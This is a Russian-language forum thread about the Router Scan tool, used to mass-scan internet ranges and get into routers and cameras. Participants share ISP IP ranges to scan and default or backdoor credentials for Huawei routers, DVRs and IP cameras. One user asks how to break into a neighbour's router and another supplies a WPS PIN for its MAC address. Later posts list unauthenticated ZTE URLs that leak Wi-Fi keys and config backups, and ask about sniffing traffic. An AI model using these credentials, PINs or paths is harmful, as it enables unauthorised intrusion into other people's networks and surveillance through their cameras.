Просмотр полной версии : прога Router Scan
CRACK211
05.01.2016, 21:23
2.48 полет нормальный) а вот 2.50-2.53 не хотят работать( кто подскажет эксплоиты из 2.53 будут работать в 2.48? Или как это можно сделать? Просто я обратил внимание что в версии 2.47 нет файла librouter.dll а в 2.48 и выше он есть . Как в 2.50-2.53.
hahanovB
05.01.2016, 21:51
а как лицензия на 10 минут.
Постараюсь завтра выложить crack и ещё кое-что...
CRACK211
05.01.2016, 22:11
2.48 полет нормальный) а вот 2.50-2.53 не хотят работать( кто подскажет эксплоиты из 2.53 будут работать в 2.48? Или как это можно сделать? Просто я обратил внимание что в версии 2.47 нет файла librouter.dll а в 2.48 и выше он есть . Как в 2.50-2.53.
На очень больших диапазонах все равно вылетает( 2.47 самая стабильная )
как я понял после появления librouter.dll в новых версиях начались проблемы) причем не только на компьютере но и теперь еще и напланшетах)
CRACK211
06.01.2016, 09:38
2.47.1 очень хорошо работает и эксплоиты есть) я ещё с 2.53 эксплоиты и два файла с паролями от роутеров в папку с 2.47.1 все работает)
Сам пользуюсь старой версией router scan 2.50 все, что выше на больших диапазонах зависает.
В 2.50 маловато эксплойтов если с более новых версий route scana добавить эксплойты в старую, конфиги править надо или так будет работать?
roman921
06.01.2016, 16:24
А как настроить роутер скан, чтобы он сам не отправлял точки на карту 3wifi ?
Triton_Mgn
06.01.2016, 16:46
А как настроить роутер скан, чтобы он сам не отправлял точки на карту 3wifi ?
Он сам не отправляет пока не нажмешь кнопку отправить.
CRACK211
06.01.2016, 16:48
main menu>settings and tweaks>output в правом нижнем углу auto uploading изменить Instand на disablet
CRACK211
06.01.2016, 16:49
Он сам не отправляет пока не нажмешь кнопку отправить.
если при первом запуске нажал YES, на автоматическую отправку в базу, то отправляет)
roman921
06.01.2016, 18:57
если при первом запуске нажал YES, на автоматическую отправку в базу, то отправляет)
Вот похоже нажимал, поменял настройки. А как из базы убрать точки моих соседей, а то так отправились, не хочу чтобы спалили они свои точки там.
Felis-Sapiens
06.01.2016, 19:08
я ещё с 2.53 эксплоиты ... в папку с 2.47.1 все работает)
В 2.50 маловато эксплойтов если с более новых версий route scana добавить эксплойты в старую, конфиги править надо или так будет работать?
Эксплойты (а точнее их исходники) в папке RS лежат больше в образовательных целях, если они вам не интересны, можете смело их удалять - на работе программы это ни как не скажется. Копировать их бессмысленно.
CRACK211
06.01.2016, 19:20
Эксплойты (а точнее их исходники) в папке RS лАндромеда так же как и. 47?)ьше в образовательных целях, если они вам не интересны, можете смело их удалять - на работе программы это ни как не скажется. Копировать их бессмысленно.
А тогда как думаете можно добавить в 2.47 новые эксплоиты? Или как можно заставить работать 2.53 на андроиде
CRACK211
06.01.2016, 19:24
Еще один парадокс) скачал из интернета портабл версию 2.50 и как не странно она работает. А 2.50 с оффсаайта через минуту закрывается. Как такое может быть? кто может посмотреть есть ли разница в файлах между портабл и оффсаайта?
Felis-Sapiens
06.01.2016, 19:25
кто может посмотреть есть ли разница в файлах портал и оффсаайта?
Скидывай обе
А тогда как думаете можно добавить в 2.47 новые эксплоиты?
нельзя
CRACK211
06.01.2016, 19:37
http://rghost.ru/7Z76nDfmw портабл
оф я удалил если найду пришлю компа нет подрукой
CRACK211
06.01.2016, 19:42
Скидывай обе
нельзя
Простите за наглость) а почему нельзя? Ведь в 2.47.1 файлы такие же как в 2.50-2.53.
Felis-Sapiens
06.01.2016, 19:57
Простите за наглость) а почему нельзя? Ведь в 2.47.1 файлы такие же как в 2.50-2.53.
Какие файлы "такие же"? Может я чего-то не понимаю - что вы хотите сделать?
Еще один парадокс) скачал из интернета портабл версию 2.50 и как не странно она работает. А 2.50 с оффсаайта через минуту закрывается. Как такое может быть? кто может посмотреть есть ли разница в файлах между портабл и оффсаайта?
Бинарники одинаковые.
CRACK211
06.01.2016, 19:59
В версии 2.47 нет файла librouter.dll а в 2.47.1 есть) вот я и подумал может можно как то обновить и добавить эксплоиты?) Или наличия файла ни чего не дает?
CRACK211
06.01.2016, 20:03
Прошу прощения это я уже натестил файлы мирещятся)
hahanovB
06.01.2016, 20:12
Нужен RouterScan 2.50
У кого-нибудь есть?
Поделитесь, пожалуйста.
Felis-Sapiens
06.01.2016, 20:13
В версии 2.47 нет файла librouter.dll а в 2.47.1 есть) вот я и подумал может можно как то обновить и добавить эксплоиты?) Или наличия файла ни чего не дает?
Нужно ещё, чтобы в библиотеке были реализованы необходимые функции. Взаимозаменяемы (по крайней мере, RS запускается) 2.50-2.52
ccrolist
06.01.2016, 20:22
Народ, подскажите, какие есть альтернативные проги для подключения к wifi точкам? Скачал несколько мониторов вайфай сетей(тестирую антенну 2квадрат), очень хорошо, много точек, но винда их видит плохо! А есть мониторы где можно подключатся к точкам? (аналог стандартному виндовому из нижнего правого угла)
Нужен RouterScan 2.50
У кого-нибудь есть?
Поделитесь, пожалуйста.
http://rghost.net/6z7RDkkWt
CRACK211
06.01.2016, 20:25
2.50 заработала на Android ) не знаю почему до этого не работала но теперь работает) 2.51 вылетает как и 2.52. попробую файлы из 2.52 скопировать в 2.50 посмотрю как работа будет
henri2002
06.01.2016, 20:31
http://rghost.ru/7Z76nDfmw портабл
оф я удалил если найду пришлю компа нет подрукой
RouterScan_v2.50_by_Stas'M_build_27.12.2014
http://rghost.ru/87QhP26jB
CRACK211
06.01.2016, 21:27
После Манипуляций с программой заработала версия 2.52, осталось понять в чем зависемости. Может смена кэш помогла может установка и переустановка внутренних программ, может диапазоны виноваты) короче 2.52 работает на android работает.
Но как и на компьютере не получится сканировать большие лиапазоны на большой скорости. плюс сильно нагружает процессор планшета.
Из скоростных и стабильных 2.47.1 и 2.50
CRACK211
06.01.2016, 22:20
Нужно ещё, чтобы в библиотеке были реализованы необходимые функции. Взаимозаменяемынайдено устройства на ней мере, RS запускается) 2.50-2.52
При добавлении порта 443 в любую из программ 2.50-2.53 программа закрывается через несколько секунд после старта. А точнее после первого найденого на 443 порте . Может быть из за порта? Может в это проблема. Без этого порта программа нормально работает
Посмотрите пожалуйста почему так происходит любой другой порт добавляю программа не закрывается. Стоит добавить 443 закрывается сразу после старта. В 2.47 такого нет.
При добавлении порта 443 в любую из программ 2.50-2.53 программа закрывается через несколько секунд после старта. А точнее после первого найденого на 443 порте . Может быть из за порта? Может в это проблема. Без этого порта программа нормально работает
Копай свои настройки, у меня этот порт всё время в роутер скане и без проблем.
HUAWEY HG8245H
telecomadmin\NWTF5x%RaK8mVbD
telecomadmin\NWTF5x%
telecomadmin\nE7jA%5m
Triton_Mgn
07.01.2016, 11:13
если при первом запуске нажал YES, на автоматическую отправку в базу, то отправляет)
Что то я за этим не уследил, а я думаю почему я столько точек отправляю а в статистике - пользователи меня до сих пор нет. Видать программа сканирует тут же выкладывает, а я после сканирования получается выкладываю их дублем и они не защитываются. И почему в программе неактивны окна Username, Password для 3wifi.stascorp.com в конфиге тоже ничего нет.
CRACK211
07.01.2016, 11:48
Копай свои настройк, у меня этот порт всё время в роутер скане и без проблем.
У меня тоже но на компьютере а на планшете вылетает на это порту.
Что то я за этим не уследил, а я думаю почему я столько точек отправляю а в статистике - пользователи меня до сих пор нет. Видать программа сканирует тут же выкладывает, а я после сканирования получается выкладываю их дублем и они не защитываются. И почему в программе неактивны окна Username, Password для 3wifi.stascorp.com в конфиге тоже ничего нет.
На это многие попадают) ни кто не читает с чем соглашаются. А потом просят удалить свои и своих соседей точки из базы
hahanovB
07.01.2016, 19:23
Сделали сборку Router Scan на Android
ccrolist
08.01.2016, 11:01
Кстати, очень рекомендую всем любителям халявы сделать антенну, я делал биквадрат(ищется на тубе).
На это многие попадают) ни кто не читает с чем соглашаются.
А есть какие-нибудь привилегии за добавление точек?
Кстати, очень рекомендую всем любителям халявы сделать антенну, я делал биквадрат(ищется на тубе).
А есть какие-нибудь привилегии за добавление точек?
Би квадрат не намного лучше стандартной моей антенны c TP-LINK 722n.
Эффекта от того что она якобы направленная я не заметил. Поставил назад родную.
По теме точек - привилегия тут может быть одна, если органы возьмут дело в оборот, угадай кто первый попадает под раздачу ?
Би квадрат не намного лучше стандартной
Значит криво скрутил антенну. От биквадрата эффект очень сильный, особенно на дальних точках, которые стандартная антенна просто не видит.
Лучше сделать патч антенну, она намного проще собирается, и невосприимчива к кривым рукам, а не как биквадрат, немного криво сделал, и все, в мусор.
если органы возьмут дело в оборот, угадай кто первый попадает под раздачу ?
подкинем монетку?
MelnykVlad25
08.01.2016, 18:30
Скиньте все диапазоны Укртелекома. Просканирую
91.124.0.0 - 91.124.255.255
93.190.40.0 - 93.190.43.255
213.186.96.0 - 213.186.127.255
185.36.56.0 - 185.36.59.255
82.207.0.0 - 82.207.127.255
195.5.0.0 - 195.5.63.255
37.52.0.0 - 37.55.255.255
213.179.224.0 - 213.179.255.255
46.200.0.0 - 46.203.255.255
178.93.0.0 - 178.93.255.255
178.94.0.0 - 178.95.255.255
178.92.0.0-178.92.255.255
95.135.0.0-95.135.255.255
95.132.0.0 - 95.133.255.255
95.134.0.0 - 95.134.255.255
94.178.0.0 - 94.178.255.255
94.179.0.0-94.179.255.255
92.112.0.0 - 92.112.255.255
92.113.0.0 - 92.113.255.255
Это все?
MelnykVlad25
08.01.2016, 18:58
Народ, не баньте) Спросил в теме про антенны, но там тухляк, может кто ответит здесь?
Народ, подскажите почему идут постоянные обрывы связи на антенне биквадрат + адаптер такой
http://kazan.onlinetrade.ru/img/ite...n7200nd_usb_high_power_150_mbps_802.11n_1.jp g
(подключен через удлинитель 3,5м )? И что лучше сделать в этой ситуации?
Убрать удлинитель
Triton_Mgn
08.01.2016, 19:00
Народ, не баньте) Спросил в теме про антенны, но там тухляк, может кто ответит здесь?
Народ, подскажите почему идут постоянные обрывы связи на антенне биквадрат + адаптер такой
http://kazan.onlinetrade.ru/img/ite...n7200nd_usb_high_power_150_mbps_802.11n_1.jp g
(подключен через удлинитель 3,5м )? И что лучше сделать в этой ситуации?
В теме про антенны не вижу вашего поста. Стоит идти туда.
henri2002
08.01.2016, 20:01
Это все?
у меня такие.
37.52.0.0 - 37.52.255.255
37.53.0.0 - 37.53.255.255
37.54.0.0 - 37.54.255.255
37.55.0.0 - 37.55.255.255
46.200.0.0 - 46.200.255.255
46.201.0.0 - 46.201.255.255
46.202.0.0 - 46.202.255.255
46.203.0.0 - 46.203.255.255
82.207.0.0 - 82.207.127.255
91.124.0.0 - 91.124.255.255
92.112.0.0 - 92.113.255.255
93.190.40.0 - 93.190.43.255
94.178.0.0 - 94.178.255.255
94.179.0.0 - 94.179.255.255
95.132.0.0 - 95.132.255.255
95.133.0.0 - 95.133.255.255
95.134.0.0 - 95.134.255.255
95.135.0.0 - 95.135.255.255
178.92.0.0 - 178.95.255.255
185.36.56.0 - 185.36.59.255
195.5.0.0 - 195.5.63.255
213.179.224.0 - 213.179.255.255
213.186.96.0 - 213.186.127.255
95.47.137.0 - 95.47.137.255
188.95.158.0 - 188.95.158.255
193.19.184.0 - 193.19.187.255
193.105.135.0 - 193.105.135.255
195.206.238.0 - 195.206.239.255
195.242.218.0 - 195.242.219.255
212.113.32.0 - 212.113.63.255
93.170.54.0-93.170.54.255
93.170.186.0-93.170.186.255
93.171.138.0-93.171.138.255
91.230.251.0-91.230.251.255
151.236.88.0-151.236.88.255
151.236.89.0-151.236.89.255
93.190.40.0-93.190.47.255
213.186.112.0-213.186.127.255
Би квадрат не намного лучше стандартной моей антенны c TP-LINK 722n.
Эффекта от того что она якобы направленная я не заметил. Поставил назад родную.
По теме точек - привилегия тут может быть одна, если органы возьмут дело в оборот, угадай кто первый попадает под раздачу ?
этот свисток мона переделать под mimo,прирост увидишь сразу,а про биквадрат-ты зря,штатная антенка у этого свиска полное ГАВ...НО
henri2002
08.01.2016, 20:42
ребята, а со своими антеннами, не хотите пойти в соответствующую тему.
http://forum.antichat.ru/threads/277674/page-25#post-3937669
Sergei7719
09.01.2016, 10:06
Я тут увидел такую статью ,не знаю реализовано ли:https://cryptoworld.su/взлом-роутеров-asus-с-помощью-эксплоита-д/
Скиньте все диапазоны Укртелекома.
37.52.0.0/14
46.200.0.0/14
82.207.0.0/17
91.124.0.0/16
92.112.0.0/15
94.178.0.0/15
95.132.0.0/14
178.92.0.0/14
185.36.56.0/22
195.5.0.0/18
213.186.96.0/19
212.113.32.0/19
213.179.224.0/19
отсканировано вдоль и в поперек
fire-dance
09.01.2016, 22:11
37.52.0.0/14
46.200.0.0/14
82.207.0.0/17
91.124.0.0/16
92.112.0.0/15
94.178.0.0/15
95.132.0.0/14
178.92.0.0/14
185.36.56.0/22
195.5.0.0/18
213.186.96.0/19
212.113.32.0/19
213.179.224.0/19
отсканировано вдоль и в поперек
интересно есле сканировать с других компов будет другой результат?
Triton_Mgn
09.01.2016, 22:55
интересно есле сканировать с других компов будет другой результат?
вполне возможно если ты будешь сканировать из этой сети, по локальным ip/
CRACK211
09.01.2016, 22:56
интересно есле сканировать с других компов будет другой результат?
Да будет . Даже в разное время и разный день сканирования дает разницу и разный провайдер) все это влияет на рнзультат сканирование
fire-dance
09.01.2016, 23:04
ВОт скажите у меня была версия 2.53 что с ней стало? При сканировании выбивать начала после загрузки в базу 1000+ точек отсканировал и не добавил какая сча вообще рабочая версия уже тону прочитал..про порт 443 и тд глючит я понял ну так какая рабочая на даный момент?
Triton_Mgn
10.01.2016, 00:03
ВОт скажите у меня была версия 2.53 что с ней стало? При сканировании выбивать начала после загрузки в базу 1000+ точек отсканировал и не добавил какая сча вообще рабочая версия уже тону прочитал..про порт 443 и тд глючит я понял ну так какая рабочая на даный момент?
2,53 + RS Test выше bnarymaster выкладывал
интересно есле сканировать с других компов будет другой результат?
37.52.0.0/14
46.200.0.0/14
82.207.0.0/17
91.124.0.0/16
92.112.0.0/15
94.178.0.0/15
95.132.0.0/14
178.92.0.0/14
185.36.56.0/22
195.5.0.0/18
213.186.96.0/19
212.113.32.0/19
213.179.224.0/19
отсканировано вдоль и в поперек
Сам перед новым годом сканировал полностью укртелекомовский диапазон сутки ушли, но сканил старой версией router scan 2.50 могло пропустить некоторые устройства. Найдено около 8% от всего диапазона провайдера. Если взять более новые версии точек найдется больше, но нужно будет диапазон провайдера поделить на части, иначе router scan будет зависать. В более новых версиях процент нахождения приближается к 10%, а на некоторых провайдерах и того выше.
проверил штук 10 таких - везде неверный пароль пишет. Может с прошивками не везет.
Нашло много, но эти сети вне досягаемости моего ноутбука. Ищу что-то поближе.
Triton_Mgn
13.01.2016, 21:18
Нашло много, но эти сети вне досягаемости моего ноутбука. Ищу что-то поближе.
Карл поближе? Карл.
заметил что на карте сайта после сканирования точки появляются сразу, а вот в поиске нет когда в поиске сайта они доступны?
Triton_Mgn
14.01.2016, 02:00
заметил что на карте сайта после сканирования точки появляются сразу, а вот в поиске нет когда в поиске сайта они доступны?
Это небольшие проблемы базы, думаю над этим работают. Сразу как появились - и далее должны отображаться, но это в идеале.
Карл поближе? Карл.
Именно) искал 3 часа... нашел Wi-Fi с названием почти похожими. Нашел сети, которые вообще не отображаются. Че за прога и что она ищет, хз. У кого-то нашло что хотелось?
Че за прога и что она ищет, хз. У кого-то нашло что хотелось?
не нашлось, это программа-обманка, рисует данные от балды
BangFunkGang
14.01.2016, 19:53
Стандартные пароли на видеонаблюдение:
DVR с TCP портом 34567 - login: guest, password: без пароля
DVR с TCP портом 37777 - login: 666666, password: 666666
Теперь telnet
DVR с TCP портом 34567 - login: root, password: xc3511
IP камеры с TCP портом 34567 - login: root, password: xmhdipc
DVR и IP камеры с TCP портом 37777 - login: root, password: helpme
CRACK211
14.01.2016, 22:09
Заметил одну странность . Когда запускаешь RS на винт ХР то потоки забиваются через пару секунд неважно сколько хоть 10 хоть 1000 потоков. Запускаю на вин7 или планшете тот же диапазон и провайдер все хорошо, работает нормально находит как надо. Почему так кто подскажет? Может это провайдеры как то противодействуют RS? пробовал разные версии одно и тоже.
проверил штук 10 таких - везде неверный пароль пишет. Может с прошивками не везет.
На такие камеры есть встроенные аккаунты.
login: default, пароль: OxhlwSG8
login: default, пароль: tlJwpbo6
login: default, пароль: S2fGqNFs
poor_Yorick
15.01.2016, 09:07
Когда запускаешь RS на винт ХР то потоки забиваются
Надеюсь, в XP ограничение на количество одновременных соединений по TCPIP у вас снято?
CRACK211
15.01.2016, 11:19
Надеюсь, в XP ограничение на количество одновременных соединений по TCPIP у вас снято?
упс) забыл, винду переустановил а про ограничение забыл) спасибо) думмаете из за него ?
На такие камеры есть встроенные аккаунты.
login: default, пароль: OxhlwSG8
login: default, пароль: tlJwpbo6
login: default, пароль: S2fGqNFs
за это - персональное и огромное спасибо.проверил штук 20 камер и все прошли по этим паролям. долго искал встроенные аккаунты на эти камеры.еще раз - спасибо. вы очень помогли только один вопрос интересует - почему-то на одну и ту же камеру ( во всяком случае на те что проверил) подходят все три пароля будем разбираться и еще одно - жаль только, что администраторских привилегий эти учетки не имеют :-(
CRACK211
15.01.2016, 17:10
упс) забыл, винду переустановил а про ограничение забыл) спасибо) думмаете из за него ?
Надеюсь, в XP ограничение на количество одновременных соединений по TCPIP у вас снято?
Все таки не в этом дело. Я устанавливал сборку там ограничение 500, поставил 1000 все тоже самое. На всех пустых IP пишет Can't load main page. когда сканирую на планшете
или на вин7 то этих IP не находит.Находит только те IP на которых есть что то)
ребят поделитесь админками
poor_Yorick
17.01.2016, 00:21
Все таки не в этом дело
А раньше на XP все было ОК??
Тогда последовательно поотключайте/потестируйте:
1) антивирус/файер (в т.ч. от ХР) - с перезагрузкой
2) лишних клиентов/службы/привязки в настройках сетевого соединения, кроме TCP/IP (в
т.ч. сниферы и мониторы) - с переинициализацией адаптера.
3) файер и др.защитн.блокировки на роутере (если он есть) - с перезагрузкой. Хотя, вроде на Win 7 все нормально, так что вряд ли поможет.
Дополнительно:
- Посмотрите, что творится с сетью в покое и при работе RS каким-нибудь монитором (и ЦПУ, кстати, тоже)
- Удалите "примочки" к драйверу сетевухи от производителя и др. сет.приблуды (если такие есть, отключите автообновление, торренты/скайпы/дропбоксы/вайберы
- Переустановите сет.адаптер "с нуля" со свежими дровами. Повторно уберите ограничение half=open...
- Обновите драйвер для чипсета матери (если адаптер PCI) и для ЮСБ (если сет.адаптер включен в нее)
- Еще могу посоветовать из своей обычной практики: пройдитесь по сет.настройкам оптимизатором InternetOptimizer из BoostSpeed 5.5.1 (с выбором оптимизации для WiFi - 2-й пункт сверху - если RS используется по WiFi, а не макс.!! / если по проводу - то макс. ) с перезагрузкой. Если автор RS порекомендует другие настройки - пробуйте их, если укажет, что RS вообще от них не зависит - не делайте этого.
- Попробуйте RS на WinPE XP на том же железе.
за это - персональное и огромное спасибо.проверил штук 20 камер и все прошли по этим паролям. долго искал встроенные аккаунты на эти камеры.еще раз - спасибо. вы очень помогли только один вопрос интересует - почему-то на одну и ту же камеру ( во всяком случае на те что проверил) подходят все три пароля будем разбираться и еще одно - жаль только, что администраторских привилегий эти учетки не имеют :-(
У меня тоже подошли вручную. Попробовал добавить их в auth_basic и auth_digest в кодировке ANSI ( TAB тоже учел), но RS эти IP (там где ручками получилось) не вскрывает. ЧЯДНТ?
Попробовал добавить их в auth_basic и auth_digest в кодировке ANSI ( TAB тоже учел), но RS эти IP (там где ручками получилось) не вскрывает. ЧЯДНТ?
и не получится.одна из причин - роутерскан ( как я понял) дефолтные пароли перебирает последовательно.и пока очередь дойдет - включается таймаут на авторизацию. по этой же причине нет смысла добавлять много паролей в пас-лист.кроме того, для того, чтобы роутерскан выдал вход - он должен определить, что вошел. но ( к сожалению) для этого нужен автор и его желание добавить код проверки. а автор нас покинул на произвол судьбы
Triton_Mgn
18.01.2016, 14:25
и не получится.одна из причин - роутерскан ( как я понял) дефолтные пароли перебирает последовательно.и пока очередь дойдет - включается таймаут на авторизацию. по этой же причине нет смысла добавлять много паролей в пас-лист.кроме того, для того, чтобы роутерскан выдал вход - он должен определить, что вошел. но ( к сожалению) для этого нужен автор и его желание добавить код проверки. а автор нас покинул на произвол судьбы
А добавление этих паролей в начало списка не поможет? То есть сам RS не может определить вход, даже при удачном пароле?
Felis-Sapiens
18.01.2016, 15:14
Попробовал добавить их в auth_basic и auth_digest в кодировке ANSI ( TAB тоже учел), но RS эти IP (там где ручками получилось) не вскрывает. ЧЯДНТ?
и не получится.одна из причин - роутерскан ( как я понял) дефолтные пароли перебирает последовательно.и пока очередь дойдет - включается таймаут на авторизацию.
Словари auth_basic и auth_digest применяются, если (как следует из их названия) сервер использует Basic (или, соответственно, Digest) аутентификацию - читаем документацию (конкретно, "Методы аутентификации HTTP"). Если же используется другой метод (в случае с этими камерами - аутентификация через веб-форму), перебор по словарям не поддерживается (по крайней мере, пока). Будут проверены пароли, зашитые в парсер, плюс пара, указанная в Use credentials (при условии, что данная функция включена) - естественно, если парсер реализован; если нет, то вообще никакие пароли проверяться не будут:
для этого нужен автор и его желание добавить код проверки
Triton_Mgn
19.01.2016, 20:48
Интересный ресурс уязвимостей http://routerpwn.com
Словари auth_basic и auth_digest применяются, если (как следует из их названия) сервер использует Basic (или, соответственно, Digest) аутентификацию - читаем документацию (конкретно, "Методы аутентификации HTTP"). Если же используется другой метод (в случае с этими камерами - аутентификация через веб-форму), перебор по словарям не поддерживается (по крайней мере, пока). Будут проверены пароли, зашитые в парсер, плюс пара, указанная в Use credentials (при условии, что данная функция включена) - естественно, если парсер реализован; если нет, то вообще никакие пароли проверяться не будут:
примерно это я и хотел сказать. спасибо, что более развернуто конкретизировали кстати, не слышали-автор к нам скоро вернется?
Интересный ресурс уязвимостей http://routerpwn.com
интересный, но не совсем.большинство эксплойтов идут из локалки причем прямо через сайт.кстати, несколькими постами ранее уже давал ссылку на этот ресурс
panfilov-25
20.01.2016, 21:11
А можно что нибудь с данными от роутеров придумать на примере программы intercepter-ng ?
трафик послушать или еще что нибудь?
А можно что нибудь с данными от роутеров придумать на примере программы intercepter-ng ?
трафик послушать или еще что нибудь?
можно очень многое.потому и нужно следить за своими роутерами
panfilov-25
21.01.2016, 16:02
можно очень многое.потому и нужно следить за своими роутерами
Подскажите пожалуйста куда в инспекторе пихнуть данные от роутера чтоб прослушать трафик
Подскажите пожалуйста куда в инспекторе пихнуть данные от роутера чтоб прослушать трафик
если задаете такие вопросы - то лучше не лезьте. тем более с intercepter. если уж очень неймется (и не боитесь встречи с друзьями в погонах)- пробуйте для начала Cain & Abel.более интуитивен. мануалы в гуглене. и больше не будем флудить.
fire-dance
23.01.2016, 20:57
Не мог найти админку к роутеру по портам искал ничего пробил провайдера
у них 10.10.10.1 как задать диапазон правильно?
Нету пароля к админке роутер TP-LINK WR940N хотел залить шелл /userRpmNatDebugRpm26525557/linux_cmdline.html
не хочет может кто подскажет? Роутер скан тока выдает пароль и пин
вроде зашел но телодвижений нету куда дальше?
http://rghost.ru/8ytbgGyDx
Роутер скан после переустановки не показывает геолокацию
у них 10.10.10.1 как задать диапазон правильно?
Примерно так 10.10.10.1-10.10.200.254
panfilov-25
27.01.2016, 03:40
http://www.routerpasswords.com
Нашёл сервис с дефолтными паролями.
Может добавить их в программу?
Triton_Mgn
27.01.2016, 04:04
http://www.routerpasswords.com
Нашёл сервис с дефолтными паролями.
Может добавить их в программу?
В чем дело? Добавляй в файл с паролями авторизации txt через "Tab".
panfilov-25
27.01.2016, 08:20
Столкнулся с соседским роутером который не поддается никак.
По мак выдаёт фирму Cameo Communications
Подскажите как его вскрыть?
У соседа провайдера знаю. Просканировал его вдоль и поперёк. Со всевозможными портами.
Мак адрес 00:18:E7:FC:96:36
Заранее спасибо
CRACK211
27.01.2016, 10:16
Столкнулся с соседским роутером который не поддается никак.
По мак выдаёт фирму Cameo Communications
Подскажите как его вскрыть?
У соседа провайдера знаю. Просканировал его вдоль и поперёк. Со всевозможными портами.
Мак адрес 00:18:E7:FC:96:36<br/>
<br/>
Заранее спасибо
D-Link DIR-615, hardware: E4, firmware: 5.11RU 61%
Felis-Sapiens
27.01.2016, 10:37
Столкнулся с соседским роутером который не поддается никак. Подскажите как его вскрыть?
Мак адрес 00:18:E7:FC:96:36
D-Link DIR-628, hardware: A2
WPSPIN = 91172501 | D-Link PIN +1
panfilov-25
27.01.2016, 14:29
D-Link DIR-628, hardware: A2
WPSPIN = 91172501 | D-Link PIN +1
ааАААА, кРАСАВЧЕГ.
Как ты это сделал?
Я уже 3 месяца над этим роутором чахну!
А тут прям сразу!!!
Отпиши в ЛС пожалуйста как ты это сделал!
henri2002
27.01.2016, 15:02
Как ты это сделал?
в проге которой повешена эта тема, в настройках есть генератор впс пинов.
panfilov-25
27.01.2016, 15:22
в проге которой повешена эта тема, в настройках есть генератор впс пинов.
К сожалению не получилось этим методом!
Triton_Mgn
27.01.2016, 16:06
в проге которой повешена эта тема, в настройках есть генератор впс пинов.
Все верно, но он неправильно определил производителя устройства - Cameo Communications , где он такое нашел неизвестно. Так же он предлагал добавить в программу login-pass по умолчанию роутеров по списку не представляя как это сделать. В общем о чем я думаю стоит объяснить старается видно.
1 - Лучше определять устройство на сайте базы 3wifi , в разделе инструменты есть - поиск по базе- устройства по mac (более - менее точный результат). http://3wifi.stascorp.com
2- В самом RouterScan в Main menu (главное меню) , есть WPS PIN Companion , который и определяет возможные пины. Если в твоем случае это был D-Link
как говорили CRACK211 и Felis-Sapiens, там есть пункт D-link+1.
3. Есть тема DevFAQ База знаний по WiFi роутерам. Где по возможности описываются методы, уязвимости роутеров, но так понимаю она не в тренде, сейчас находится на второй странице, добавлять в базу можно свои наблюдения , что скажется на облегчении труда. Конечно хотелось бы собрать такую базу и идейных людей, тем более, что вряд ли производители роутеров которые устарели будут, что то делать по закрытию дыр в старых девайсах. Так, что призываю добавляйте любую информацию, она будем систематизироваться и выкладываться вам же в пользование, ну а потом и до прилепленных тем не далеко.
часто попадаются вэб камеры. мб у кого есть дефолт пассы - поделитесь
он неправильно определил производителя устройства - Cameo Communications , где он такое нашел неизвестно.
http://tools.windowsfaq.ru/handbook_module/mac.html
MAC адреса, начинающиеся с 0018E7, зарезервированы за компанией Cameo Communications, INC.
Почтовый адрес: NO.42, Sec. 6, Mincyuan E. Rd.
Taipei 114
TAIWAN, PROVINCE OF CHINA
Triton_Mgn
27.01.2016, 23:16
http://tools.windowsfaq.ru/handbook_module/mac.html
MAC адреса, начинающиеся с 0018E7, зарезервированы за компанией Cameo Communications, INC.
Почтовый адрес: NO.42, Sec. 6, Mincyuan E. Rd.
Taipei 114
TAIWAN, PROVINCE OF CHINA
Славва всем !! Не буду спорить
Ему нашли в чем сыр бор?
panfilov-25
28.01.2016, 03:57
часто попадаются вэб камеры. мб у кого есть дефолт пассы - поделитесь
Вот почитай http://pikabu.ru/story/shpionim_cherez_quotprivatnyiequot_kameryi_videona blyudeniya_3294899
И комментарии не поленись тоже почитай. Там много нужной инфы. Летом как раз этим занимался.
Вот почитай http://pikabu.ru/story/shpionim_cherez_quotprivatnyiequot_kameryi_videona blyudeniya_3294899
И комментарии не поленись тоже почитай. Там много нужной инфы. Летом как раз этим занимался.
спс!
часто попадаются вэб камеры. мб у кого есть дефолт пассы - поделитесь
http://forum.antichat.ru/threads/398971/page-96#post-3940399
http://technosec.com.ua/novosti/ip-kamery-i-ih-paroli
http://www.bestdvr.ru/support/passwords.php
в отношении VNC
https://hackssec.wordpress.com/2014/06/21/брутим-vnc/
Cameo Communications , где он такое нашел неизвестно
Cameo Communication - это OEM производитель оборудования, большое количество дэлинковского барахла изготовила именно эта фирма по заказу, нацепив на роутеры лейбу дэлинка. DIR-615 E3 как раз к таким роутерам и относится.
http://s017.radikal.ru/i403/1601/b8/42f93b6f2bef.png
Felis-Sapiens
29.01.2016, 17:23
Уязвимость в роутерах ZTE (F660, H168N, T103H, H108L, ...). Можно посмотреть:
системную информацию - /status_dev_info_t.gch
ESSID, Key - /wlan_security.gch
бэкап настроек - /manager_dev_config_t.gch
http://www.wooyun.org/bugs/wooyun-2010-066850
Triton_Mgn
29.01.2016, 17:57
Уязвимость в роутерах ZTE (F660, H168N, T103H, H108L, ...). Можно посмотреть:
системную информацию - /status_dev_info_t.gch
ESSID, Key - /wlan_security.gch
бэкап настроек - /manager_dev_config_t.gch
http://www.wooyun.org/bugs/wooyun-2010-066850
Felis-Sapiens Не могли бы Вы добавить такую ценную информацию в таблицу http://forum.antichat.ru/threads/435030/
База роутеров, там как раз собирается такая информация.
Felis-Sapiens Не могли бы Вы добавить такую ценную информацию в таблицу http://forum.antichat.ru/threads/435030/
База роутеров, там как раз собирается такая информация.
информация ценная. таблица - тоже хорошо. только на мой взгляд лучше было бы создать таблицу с данными эксплойтов и описания уязвимостей ( типа того, что описал уважаемый Felis-sapiens), а не просто таблицу с роутерами и информацией о том, берет его ривер или нет. со всем уважением к автору темы таблиц.
кстати, предлагаю еще создать тему по апикамерам которые определяются роутерсканом. самому создавать и вести тему нет возможности. если есть желающие - буду участвовать. в теме главное выкладывать стартовые страницы входа на различные камеры, чтобы првильно определить какие пробовать дефолтные пароли или эксплойты. может заодно и получится пополнить базу роутерскана, когда автор к нам вернется
п.с. хороший сайт. https://www.ispyconnect.com/sources.aspx уязвимости апи камер.
Telariust
29.01.2016, 21:27
...пароль может храниться в NVRAM...
можно попробовать подсунуть в качестве файла что-то вроде /dev/mtdblockX, но это может уронить роутер Мой подопытный образец сейчас оффлайн, не могу проверить.
нужен вывод команды:
cat /proc/mtd
чтобы точно знать, какой mtdX вызвать по адресу /dev/mtdX
Хотя вообще-то это по-нормальному дампиться как "dd if=/dev/mtdX of=/tmp/mtdX.txt".
Так что хз, откроет ли.
Но. "cat /dev/mtdX" возвращает тоже самое что и dd, а значит должно открывать.
пример ответа (НЕ от TL-WRxxx)
dev: size erasesize name
mtd0: 00020000 00010000 "pmon"
mtd1: 007d0000 00010000 "linux"
mtd2: 00587ce0 00010000 "rootfs"
mtd3: 00010000 00010000 "nvram"
